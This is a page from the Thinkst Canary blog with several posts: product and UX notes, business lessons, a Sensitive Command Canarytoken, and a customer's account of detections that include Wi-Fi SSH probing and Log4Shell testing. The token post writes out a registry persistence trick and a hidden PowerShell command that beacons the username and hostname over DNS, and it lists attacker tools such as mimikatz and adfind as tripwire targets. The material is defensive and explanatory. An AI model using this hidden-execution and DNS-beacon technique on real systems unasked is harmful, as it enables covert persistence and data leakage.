    Canaries and Canarytokens are powerful tools that are easily deployed. Recently a security researcher, Daniel Hückman discovered his AWS Canarytokens stored in his CircleCI environment being improperly used. 

    The credit card Canarytoken provides more ways to monitor your environment, as well as the exposure to your data by third parties. Credit card fraud amounts to almost $40B per year worldwide, we hope that with faster response times to a breach to help make a [small] dent in that figure.

    We think that our Canarytokens offer great protection and detection capabilities while being easy to deploy, and cost-effective (free!). By giving them away for free, we introduce a risk for attackers who are trying to monetize their access, from AWS credentials that may provide access to the crown jewels to an Excel document called “2022 Taxes”–attackers need to step a little more carefully. 

    We hope you’re as excited about this new token as we are (and that it never has to alert you).
    Ps. if you are a bank/card-issuer that wants to work with us to help protect your customers too please drop us a note at research@thinkst.com

  • Seasonal themes, delighting users & small UX touches

    Seasonal themes, delighting users & small UX touches

    We’ve written before about the effort we put into UX choices in our app. We don’t consider problems solved just because we kicked out a feature in its general vicinity and we are super strong believers in “small things done well

    This came to the fore again recently when we included a “seasonal theme” into customer Consoles and I figured it was worth a brief post to examine our thinking around (even) short-term UX.

    In our early days we’d give a brief nod to seasonal changes by slightly altering our Twitter avatar.

    Having an actual legit designer on the team gives us significantly more leeway, and so “Console Seasonal Themes” was born. The plan is to (very infrequently) add small non-obtrusive splashes within the customer Console when a reasonable opportunity arises. These splashes should be subtle and hopefully bring a quick smile to someone’s face as they go about their day.

    Halloween was the first opportunity to take it for a spin, and Blake threw up a few concepts. We wanted to make sure that the theme never came close to interfering with anyones workflows so ended up with two main areas to decorate: the Console header, and the Canary logo. He chose to animate ghostly birds in the header, and the logo got an appropriately spooky makeover.

    It was beautiful but before unleashing it on all customer Consoles, Nick felt strongly that we should also include a button to disable the animation/effect.

    We know how some customers prefer to even disable minor window animations in the UI so it was the right call. I was originally ok with simply feature-flagging the effect, which would allow the CS/support teams to disable it if a user complained, but Nick correctly pointed out that this was making the customer do too much to switch off something they never asked for.

    So he added a toggle under settings to disable the animation:

    This seems like a reasonable place to ship it, but there is still a flaw: how does a user who signs in know that the animation can be turned off in settings? If they don’t know the toggle is there, it might as well not be.

    So the team next tried adding a small unobtrusive button on the actual header.

    The generic ℹ️ button looked like a candidate for replacement. We went through a few quick variations and settled on a relatable jack-o’-lantern:

    The button that only shows up as you approach the click-zone is a pattern we use elsewhere in the app to keep the interface clean while offering needed functionality but once more the problem would be: how does a user know they should go there to float up the button?

    Instead of ever making the button completely disappear, we opted to use colour and a slight wiggle to bring the user’s eye to it:

    At this point, one would be tempted once more to ship it, but if we are being completely honest, the current jack-o’-button, even with its little wiggle could slip by as part of the animation. It isn’t immediately obvious (unless you’ve spent as much time as we have looking at it) that the lantern is actually a button.

    So what we wanted was a button that didn’t look like a button but that people would know was a button, and we wanted it to be well hidden enough but not too much. These kinds of seemingly opposing constraints aren’t atypical in UX. Folks can think in terms of trade-offs or middle-ground, but with enough effort, we usually end up with a better result than just meeting-in-the-middle.

    The final form then was wiggling, colour-changing-jack, but with a quick flash when the page loads to let you know that something was under there. It didn’t matter if the text escaped too quickly, because your natural reaction would be to hover in the area (which could then activate the button).

    Ultimately, it was worth it. We enjoyed making it happen and customers (at least some of them¹) found it delightful!


    ¹ 153 Consoles disabled the effect (Which is less than 10% of those it ran on). Counter-intuitively, we count that as a win too, since we gave customers that option and they clearly found the button!

  • Company Lessons (from YouTubes “Hot Ones”)

     I recently discovered “Hot Ones” on YouTube. If you haven’t seen any of the episodes, you should (because they really are fantastic). This isn’t really a controversial opinion: their YouTube channel has 12 million subscribers and almost 2,6 billion views.

    The show has a few lessons that I think are worth noticing/stealing. I’ll discuss 3 of them here (even if they are kinda random).

    1) Genuine Warmth

    One would expect the show to lean on a kinda gotcha-slapstick routine: we all laugh at celebs suffering, but that isn’t really how it goes. The host (Sean Evans) suffers every moment with his guests and is super empathetic throughout. It’s not adversarial at all and guests reaching the end have a kind of shared bond with the host (and the audience).

    Lots of companies are polite to customers (in front of them) but snicker about them behind their backs. Everyone recognizes the meme of tech-support insulting “idiot users” who just don’t get it. Even if this stuff isn’t said directly, it can’t really be hidden. It eventually seeps out of an organizations pores.

    This is one of the reasons we focus so hard internally on customer love. We aren’t just doing it to be polite. We know that our customers could have bought anything, but they bought us. We deeply want them to win and we deeply want them to get it. This also can’t be hidden (and also seeps out through our pores).

    Putting in the work (off camera)

    Sean Evans is an incredible interviewer. There are a bunch of compilations online of guests being impressed by the depth of his questions.

    Part of this is because the hot-sauce takes out guests ability to answer:

    But the questions are definitely deep and super well researched:

    Interviews in the past few years explain how they get this right:

    Between episodes is when the real work begins…

    Once a guest is booked, the three-person research team goes to work. “There’s a lot of armchair psychology that goes into the show,” says Schonberger. In practice, that means Evans’ brother — Gavin, who lives in Chicago — will compile a dossier. “He’ll basically read like every article there is, every profile, every Reddit AMA, like reading everything that he can find and create,” says Schonberger, noting that they can run to something like 30 pages long. “It’s almost like we’ve created our own Wikipedia template that’s suited to the show.”

    Sean, on the other hand, does the videos. He’ll consume 12-24 hours of clips, looking for breadcrumbs. …

    Schonberger does some of the podcasts, which means he listens to everything he can get his hands on. It’s the same idea as with the videos, except people are usually less guarded on podcast appearances than they are during video shoots. Then they compare notes, and Evans and Schonberger come up with ten topics to hit during the interview.

    the verge

     We’ve been championing this line of thinking forever. Boxers don’t win their fights in the ring. It’s why we push so much for putting in the miles. It’s why we spend so much effort working on the tiny details that most people won’t see. It’s because the results are worth it (even if most ppl don’t know what’s behind it).

    Following a Script (This is an unusual / subtle one)

    When a new person joins us in customer-success/pre-sales we teach them about Canary, why we build it and how we demo it. One personality archetype quickly decides that they will learn the product but will wing-it for demos. They seem slightly surprised that we stay close to a fixed format even if we have been demo’ing Canary (or building it) it for years. Following a script almost seems like an insult to them:  they have a mic and they are smart and they can show off the newest features. 

    With all the praise (in the previous point) for Sean, and now 18 seasons of the show under his belt, it’s worth checking out this quick super cut of guests starting and then clearing the final wing:

    Once it locks in, he almost never deviates from the script. We’ve already established that he isn’t lazy, so why do they do it that way? 

    The same reason we do. Because it works. There are places to customize, and places to go deep but in key areas, it runs on rails. The script works and they’ve stuck with it for 18 seasons.

    We understand why some new people don’t want to demo close to the original script: they are smart enough and skilful enough to not need guide-rails. It’s also human nature that after you’ve done a demo n-times, you want to do the n+1th differently. 

    When you showed 10 people the basic features of the system, you somehow expect that the 11th person needs to see the advanced features because you already spoke about the basics 10 times, but this is a fallacy. The 11th person is also seeing the product for the first time and they may smile through the advanced features – but you aren’t giving them the same experience you gave the first 10 and theres a good chance you leave them confused.

    The show is worth watching – you should check it out…

    [All this was to allow me to watch tons of YouTube videos calling it management-research]

  • Sensitive Command Token – So much offense in my defense

    Sensitive Command Token – So much offense in my defense


    Many people have pointed out that there are a handful of commands that are overwhelmingly run by attackers on compromised hosts (and seldom ever by regular users/usage). Reliably alerting when a user on your code-sign server runs whoami.exe can mean the difference between catching a compromise in week-1 (before the attackers dig in) and learning about the attack on CNN.
    Introducing our new Sensitive Command Canarytoken.

    This quick/simple Canarytoken alerts you any time your chosen command is executed on a host.

    For example: This token creates registry keys to alert you anytime whoami.exe runs on a host.

    If an attacker lands on the server and runs whoami.exe (as most attackers almost instinctively do) they get the results they expect.

    And you get an alert to let you know that something bad is afoot.

    Why this token?

    In nearly every ransomware report, we can see attackers running a series of predictable commands on endpoints.
    Some of those commands are almost never run by regular users through regular usage. This means that they become high quality markers of “badness”.
    Wouldn’t it be great to get an alert the moment someone runs WMIC on your code-signing server? Or the moment someone runs whoami.exe on your SQL-Server? Many organizations will use EDR (Endpoint Detection and Response) tools to do this. However these complex telemetry streams, and detection logic may not be available to small organizations, may not be comprehensively deployed and often require specific configuration changes to alert on these invocations.
    We want to know, and we want the setup to be dead-simple.

    tl;dr – Just show me the token

    If you visit https://canarytokens.org and view the list of available tokens, you will notice a new Canarytoken type: “Sensitive command token”
    Choose the Sensitive command token.
    Next, like other Canarytoken configurations, we add some quick details:
    [1] Where to send the alert, (email or webhook, or both);
    [2] A reminder note, that will help you react when you receive an alert from this token;
    [3] Choose the process that you want to monitor execution for (e.g., wmic.exe, whoami.exe, klist.exe, nltest.exe).
    The Canarytoken server will create a .reg file for you to download and import onto a Windows 10, or Windows 11 system (or use GPO to deploy across multiple systems).
    Once you have downloaded the .reg file, you can import this to the system (or systems) you want to monitor.

    reg import

    Remember this will require local Administrator permissions.

    That’s it! If a user on this host ever runs that (sensitive) command, you will receive an alert!
    It’s worth noting that this Canarytoken does not impede or alter the original command in any way, it simply sends you a near real-time alert that someone has executed our tripwire.
    In the alert you will see the details of the time of the alert, the user that executed the command, and the computer name the command was executed from.
    A subtle benefit of how this token is designed allows you to deploy the same token on multiple machines without making any changes. Running reg import across a host of machines will tripwire them all, and when an attacker runs her command on any one of them, you will know.
    There you go!
    We can now create a Canarytoken to alert us on Sensitive Commands that execute.
    These commands may be sensitive due to the fact that they are rare, used by attackers, or are sensitive to your organization. How you choose to pick the executable is up to you.
    Bonus: the executable does not need to be present on the system. Suppose your organization never uses adfind.exe.  You could add this tripwire, so that if someone ever downloaded that to your system and executed it you would be notified.
    Additionally you sometimes don’t want to run AV/EDR on some machines, or 3rd party systems that won’t allow you to install software, but here you can monitor an executable or five.
    That is all you need to get started using this new Canarytoken. If you would like to learn more about the architecture and mechanics under the hood: continue reading.

    Under the hood

    Problem Statement:

    We wanted to see if we could find a way to generate an alert to our console when a suspicious command is executed on a system. Without interfering with the original command execution.
    The best candidate command for this alert is one that is rare, short lived, and used by attackers.
    In short, if you want to receive an alert if someone runs wmic.exe on a workstation, this may be the Canarytoken for you.  This token creates a .reg file with three registry entries that you can import to the system. You will need Windows 10 or 11, and Administrator access to the systems you want to add this to.

    Token Architecture:

    Our team spent a number of cycles trying various experiments and approaches to generating an alert based on process execution. From doskey, to wmi, to performance monitoring. We settled on an older Pentesting Persistence trick that in the end met all our requirements.


    In his blog post on “PERSISTENCE USING GLOBALFLAGS IN IMAGE FILE EXECUTION OPTIONS“, Oddvar details how to persist in the registry and execute a command on a Windows system that runs in the background. This technique meets our requirements exactly. We needed a tripwire that would run in the background, not interfere with the original process, and allow us to make a custom callback/alert over DNS to alert a system administrator, or security team, that a suspicious command had been executed on the system.
    (We have also seen a debugger variation of this technique used by high profile attacks as well.)
    “The attackers achieved this by having the SolarWinds process create an Image File Execution Options”
    We will repurpose the mechanics of this attacker technique and turn it into a defender tripwire!
    Oddvar demonstrated his technique  to establish persistence and run an arbitrary executable, we will use it to reliably generate a remote alert.
    This Canarytoken does not add any new executable to your system thanks to the wonders of Oddvar’s technique, built-in tools and the Canarytoken server. We will be using Microsoft’s built-in SilentProcessExit monitoring, documented here:
    The specific registry settings we are interested in:
    Image File Execution Options\{ProcessName}
    You will see in the registry output above, we set this to the value 0x200. You may need to ensure that the process you wish to monitor isn’t impacted by this setting.
    Next we set the ReportingMode to 0x1.
    “When silent exit is detected, the monitor process (specified in the Monitor Process box) is launched.”


    The bulk of the work for this alert is what we configure in the MonitorProcess value.
    Let’s break down the command to trigger this alert:
    ""MonitorProcess"="cmd.exe /c start /min powershell.exe -windowstyle hidden -command \"$($u=$(\\\"u$env:username\\\" -replace('[^\\x00-\\x7f]|\\s', ''))[0..63] -join '';$c=$(\\\"c$env:computername\\\" -replace('[^\\x00-\\x7f]|\\s', ''));Resolve-DnsName -Name \\\"$c.UN.$u.CMD.g6jjwnaukbfddgz51kh8tacdc.canarytokens.com\\\")\""
    The various \\\ sequences are to ensure proper escaping for both the command to run and to import into the registry.
    First we call “cmd.exe /c start /min”. We do this as a trick to make the execution of our alert appear to run in the background. Even when we set -windowstyle hidden, with PowerShell, a window would appear, briefly but this wasn’t acceptable to our goals. We also added some code to remove the non-unicode characters and to remove spaces. To ensure the alert data can be passed over a DNS query.
    Next we run a PowerShell command to resolve our Canarytoken DNS.
    We can leverage our ability to encode data into the DNS request. This is documented here
    Our lookup captures computername.username.token. Why PowerShell? We had some interesting collisions with trying to use the %computername% environment variable in say an nslookup command, due to the fact that MonitorProcess parses the registry key and uses the %c to report a status code. So after a few iterations, and experiment we found PowerShell the easiest way to collect the variables we need and add them into the alert.


    • Installing the .reg file requires admin privileges;
    • Selecting the wrong “sensitive executable” will yield false-positive alerts;
    • Hostname and Username are sent in clear-text in the alert;
    • Process level alert: we only see that the process was executed, this approach does not give us command line granularity;
    • These commands may, upon installation, look like attacker commands . Not the alert itself, but the installation, this is due to the fact we are repurposing an attacker trick;
    • This alerts on all executable matches for the filename. If you need further refinement, you can customize this by setting the FilterFullPath registry key;
    • Image Architecture, these keys were tested for x64.  You may need to customize the settings if you are hoping to alert on x86/32 bit execution. C:\Windows\SysWOW64\whoami.exe may evade the alert. Again, something to be aware of if you are looking into these for critical areas;
    • This alert won’t catch a renamed binary since the alert triggers on the process name.
    For example, our Canarytoken alert won’t fire if the binary has been renamed, but that is ok. If you need a tool that alerts on Process Execution, by OriginalFilename, Location and Command Lines, there are several to choose from.  We just wanted to call that out, so you are aware of some of the limitations of these types of alerts.
    We do also see utility for teams to set tripwires for executables they never wish to see executing. Suppose we want to set a tripwire for mimikatz.exe.  We can create the registry key, even though mimikatz.exe is not present on the system.  Then if anyone ever executes a file with that name, we will receive an alert!  You may also extend this to internal tools or executables as well.

    Choosing a binary to monitor:

    Candidate sensitive commands:
    • Short lived, exits quickly
    • Low frequency
    • Low execution prevalence
    • Indicative of suspicious or unusual activity.
    Each organization will need to look at command frequency, look into various threat reports and make that decision. If you need to disable a Canarytoken like this, you could for example set the Image File Execution Options \GlobalFlags value to 0x0, then set it back to 0x200 if need be.
    For example: We’ve seen in nearly all ransomware attacks, schtasks.exe be leveraged. This binary at first blush seems like the ideal candidate to token but  it turns out that schtasks runs frequently in the background, so it doesn’t meet the candidate criteria of Low frequency.
    Additionally Windows will create an event in the Application log when these events occur.  These may allow teams further investigation data. The only requirement to record these events is that the Image File Execution Options\{ProcessName}\ GlobalFlags key be set to 0x200.
    For those interested in additional details,  you will also see the EventID 3000 in the Windows EventLogs to indicate Process Exit Monitor has occurred. Teams that are interested in a lightweight process monitoring record. Can simply create and set a GlobalFlags == 0x200 , and they can observe over time whether or not the process is frequent or not. Also they can determine if the process runs and ends quickly. This may also be a good Indicator of Compromise , for teams not expecting to see a particular process with this flag set.
    As an example you can see below a quick way to search for these events and extract the Usernames.
    $Events = Get-EventLog -LogName Application -InstanceId 3000 -Source “Microsoft-Windows-ProcessExitMonitor”
    $Events | %{ $_.Username }


    We looked at creating a new Canarytoken type that allows us to receive an alert when we specify an executable name that we want to watch for. We can do this by adding three registry keys and a PowerShell command to trigger a DNS lookup for us. We overload the DNS request with sufficient data to generate a meaningful alert for defenders. (We wrap all of this up in one simple .reg file import).
    We discussed some of the advantages and disadvantages of this approach. We are able to do this by leveraging the alert pipeline that you have, perhaps already used.  If you would like to customize these tokens you certainly can too (and you can always run your own custom version of the free Canarytoken server. See the GitHub repo here https://github.com/thinkst/canarytokens).
    Thank you for taking the time to read, and we welcome feedback on ways to improve and refine this new Sensitive command Canarytoken. Thanks again to the Applied Research team at Thinkst for all the testing and feedback to help us bring an idea forward that may prove helpful.


  • Canaries as Network Motion Sensors

    Canaries as Network Motion Sensors


    This post is the first in a series by Canary customers where they detail how they integrated Canaries and Canarytokens into their security practice. This series hopes to showcase how organizations of varying sizes and structures deployed and acted on alerts to improve the security of their networks. Casey Smith recently joined Thinkst Labs, today he’s sharing his experiences with Canaries and Canarytokens from his previous role as a customer.


    Prior to joining Thinkst, I worked for a number of years as the Principal analyst on a security team at an organization of ~3500 people with a highly regulated security practice. Our team was responsible for several systems: Email, Web Application, Proxy Server, Host based EDR, Application Control, Security Analytics, as well as Incident Response, internal testing and penetration testing. I would consider our team a fairly mature security team, with lots of tools, software, and telemetry to inform our security response. We found that Canaries detected activity that our other tooling and telemetry did not.

    Some of these examples have been modified slightly to avoid disclosure of certain internal details.

    Our team prioritized visibility, followed by detection, then prevention. We can’t defend what we cannot see or detect. This philosophy helped our team gain great insight into our network, systems and applications. EDR for example, would allow our team to search for any host, any process, that makes a DNS request. We could then correlate that with other systems to react to unauthorized, or suspicious access. We still found incredible utility from Canaries in these cases and they are a much lower cost than many of the other tools we purchased and deployed. We were able to leverage Canaries to detect both internal and external attacks.

    While no defense is perfect, this model informed our approach, along with a tight feedback cycle between detection and prevention.

    Some questions we constantly tried to ask of ourselves:

    1. How do we know this tool is working?
    2. Have we tested this tool?
    3. How do we know if an attacker is moving around in our network?
    4. What tools work to detect already compromised systems, and lateral movement?

    Below is a diagram of Mandiant’s Standard intrusion model, as attackers traverse from left to right, and I’ve annotated it with where we thought about inserting canaries for detection.

    Once an attacker gains initial access, they often do not know where they are. They have to discover, and enumerate services, targets, find credentials or elevate privileges. In essence they bump around, and this can be a defender advantage. This can be done a number of ways, local and remote:

    1. Port Scanning
    2. Active Directory Enumeration
    3. Internal Sites, SharePoint, Confluence
    4. Network Shares, Documents
    5. Local accounts, Local Privilege escalation
    6. Exploits, Vulnerable services, Misconfigurations (Windows Services, etc.)

    This can be to the defender’s advantage to shape the environment early on for the attacker.  What we want to do is present some tempting targets to the attacker, and have them attempt access. This tipoff should then be enough for us to investigate further, if they trigger an alert.  Tempting targets can be files, (Canarytokens) , or Network Services (Canaries). This blog seeks to share some real-world approaches for creating those targets, as well as challenges and opportunities we faced. Below we explore in detail four scenarios:

    1. SSH Detection on Guest Wireless
    2. Cyber Insurance Documents – CanaryTokens
    3. The Alert that should never happen
    4. Log4J Zero Day Detection, Remediation

    SSH Detection on Guest Wireless

    Like many corporate offices we offered free guest Wi-Fi to visitors. At the time there were few controls and little monitoring there, except for an Acceptable Use Policy. This we decided would be a great place to see if anyone was attempting attacks against our exposed Guest Wi-Fi service. We could then detect attacks and correlate attacks across multiple locations.  We set up a Physical Canary in our Guest Wireless VLAN. It took us about 2 weeks from the time we decided to deploy, to get the necessary approvals and coordination, attested and validated etc… This will vary from organization to organization. The way our Wi-Fi was configured, we put the bird in the first VLAN just past the Access Point. Access Points for example, in our configuration, prevent one Wi-Fi guest from sending packets to another. So the natural choice was to place the Canary in a VLAN that was accessible from any Wi-Fi guest. Finally we had the bird in place. Our team deployed a Linux profile with SSH, Web Server, and Port Scan Detection. We tested the alerting infrastructure with our integrations to ensure the analysts would be ready. Once this was validated, the tripwire was set and we waited. It did not take very long for an alert to fire.

    It took just a few days before we received our first alert on Port Scanning and SSH attempts for the Wi-Fi Canary. We immediately started working our Incident Response process to validate the alert was legitimate. Even if it is a false positive, it has been my experience that teams learn by running the alert to the ground, to help further tune and improve.  Typical alert volumes (even without Canaries) would vary week to week, But on average the team would do a complete investigation on anywhere from 5-10 alerts per week, on the low end. These ranged from malicious email that bypassed our spam filtering, to endpoint alerts on suspicious files, and suspicious URLs visited. In almost every case, even if the alert was a false positive, the investigating analyst learned more about the log sources, and gained experience querying them. Also this allowed us to create documentation and surface any gaps or places where we hit a dead end in an investigation.

    Once we determined the alert was valid, we reached out to the Network team for any indicators, logs or other data on the connected attacking host. Our alert provided us three dimensions, a Time Stamp, a Source IP address, and User Name/Password attempted. We wanted to then research any and all activity for that host as far back as we could get. To our delight, the Network team had immense insight into Wi-Fi. They were able to present us complete logs to validate the alert and also provide details of where the attacking device was in the building!

    For more one example on how see this blog.

    It looked something like this:

    We wrapped up our investigation and dealt with the rogue host that had:

    1. Scanned our Guest Wi-Fi, and
    2. Attempted an unauthorized SSH login.

    This was our first real win with a Canary detection and word began to spread within the organization that we had some pretty exceptional tools. This can be helpful. In reality, it was good testing and team work. Security teams never investigate in isolation, they require close coordination with other teams, web administrators, networking teams, and endpoint teams. This incident helped reinforce our classification of these Canaries as “Network Motion Sensors“. We want to know when someone is attempting to move around on our network. Canaries may extend the range and reach of your detection. Places where you cannot install software on endpoints. Conference Room scheduling panels, IOT/ICS segments, or other sensitive segments etc…

    Cyber Insurance Documents – CanaryTokens

    While reading recent public Ransomware reports, we learned that some Ransomware crews were reading Cyber Insurance Policies and targeting those organizations for payments.

    (See this story for example)

    So we decided that these Policy Documents were a prime candidate for placing Canarytokens. Canarytokens (for customers) allows you to upload internal documents, and tokenize them.

    We embedded a few policies inside a shared folder within the organization. These documents were placed alongside real policies, and located in a read-only global share. It wouldn’t take long before the alert fired and we caught an unauthorized read of these files.

    When we built the alert, it had context on who was authorized within the organization to read these documents. In an attempt to read these, the security team was to follow a rapid escalation route to curate this alert. We had an unauthorized attempt to read these files! We were then able to use the EDR tool to review activity of the user and endpoint that had opened the documents.

    This was a great win for catching unauthorized document access. Some teams will argue that the same events could be fired in with Windows Alerts and logs, and while true, Canarytokens in well placed Word files, provided faster detection and validation.

    Alerts that should never have happen

    Like most companies, we had some segments that were highly protected and we were fairly confident would never be reached. For completeness, we decided to create some fake documentation on an internal web page, then deployed some Executable and DLLs along with fake instructions on usage and access. We hoped this would never go off.

    What happened next was quite unexpected. An internal user with access to the location where we placed the package ran the tokened executable. However, it was WAY out of this user’s role to ever attempt access to this segment. So when teams worry about insider threats, this was a great real-world example of catching those threats. In the end, this particular employee received disciplinary action, due to the exploration and execution of binaries, outside their described role.. Within the Canary portal, or Canarytokens.org, teams can create and upload basic executable files that alert when executed, as well as when the file properties are read. This can immediately alert you to someone attempting to gain access to a more restricted area.

    Log4J Product Zero Day Detection, Remediation

    The final Canary use case I wanted to highlight is related to the Log4J vulnerability. When the Log4J vulnerability (Log4Shell) was announced in early December, our team sprang into action. What you may not have heard, is the private story of how Canaries helped us validate a ZeroDay in a product. At that time we had been working with an Advanced Red team that was struggling to gain access from external only vantage. This team had the ability to create custom exploits for targets unique to their clients. So they had extensive exploit development experience. The Log4J vulnerability timeline seen here.

    When suddenly Log4J was announced, the Red Team reached out privately, Thursday, December 9, late in the afternoon, and informed us we had edge servers vulnerable to this attack, and asked if we could test and validate. This gave our team a head-start in understanding the impact and urgency of this exploit.

    The initial focus was on internal application and services. We hadn’t yet considered that this attack might affect our 3rd Party External infrastructure. At the time, we had some early python scripts to test and validate. Initial compromise and uses of this exploit were of the “exploit and call back variety” . So you would exploit the server, and it would attempt to download a second stage. This was mitigated by our External Firewall rules restricting outbound callbacks. However, we began to see over the next few days that a DNS variety (as depicted in the graphic above) was emerging that could exfiltrate keys or other sensitive host settings over DNS. We were able to verify our DNS logs were accurately recording lookup attempts traceable back to endpoints as well.

    Around this time the canarytokens.org site began to publish free Log4J token strings.

    These were immediately useful for our team to help test and validate any mitigation and controls we had deployed. So we started to create 10-12 Canarytokens, so we could test and review settings. While this may not have been the intended use of those, it really helped our team isolate and contain vulnerable systems, by ensuring we had a safe way to really test the exploit.

    Sample Log4J exploit, sends hostname out over DNS:


    So Canarytokens, for Log4Shell were immensely valuable to our security team, since we could reliably test, nor attempt to use sketch public exploit code, etc…

    Key learnings

    Each of these scenarios helped us learn about how to use Canaries and tokens as part of our security practice. Each of the key learnings are listed below in case they help you with your deployment:

    1. SSH Canary – Integrating alert data into existing tools even across teams can provide more insights than a single alert alone.
    2. Cyber Insurance Documents – Putting the context for what would be unauthorized access in the token comment allowed for immediate identification of malicious behavior versus someone inadvertently opening the wrong file that they were supposed to be accessing.
    3. Alerts that shouldn’t happen – Even for areas where you are pretty sure you have things covered, Canaries and Canarytokens are a quick way to let you know when your assumptions have broken down.
    4. Log4Shell tokens – Tokens don’t have to only be used as tripwires, they can be used as a probing mechanism to understand how your environment really works to secure accordingly.

    Closing Thoughts

    I have written here about four scenarios. I think the operational impact of canaries cannot be understated, for teams with limited budget and support, Canaries and Canarytokens punch well above their weight class. The alerting pipeline and infrastructure as well are incredibly useful. However, it is also important to remember that a Canary alert is never enough to completely convict or evict an adversary. These, in my opinion, are like smoke alarms, or a motion sensor alert. It will take teams working together and ensuring their birds are cared for and tested and ready to go–much like changing the batteries in your home smoke detectors! Teams may want to periodically ensure they have what they need to respond to an alert. Even among all the other tools we had deployed, from Endpoint to WAF, using Canaries helped our team increase the range of our detection capabilities further into the network.

    We hope these examples spark your interest and curiosity into ways organizations are getting value from Canaries and Canarytokens.

    Thank you for reading.

Site Footer

Authored with 💚 by Thinkst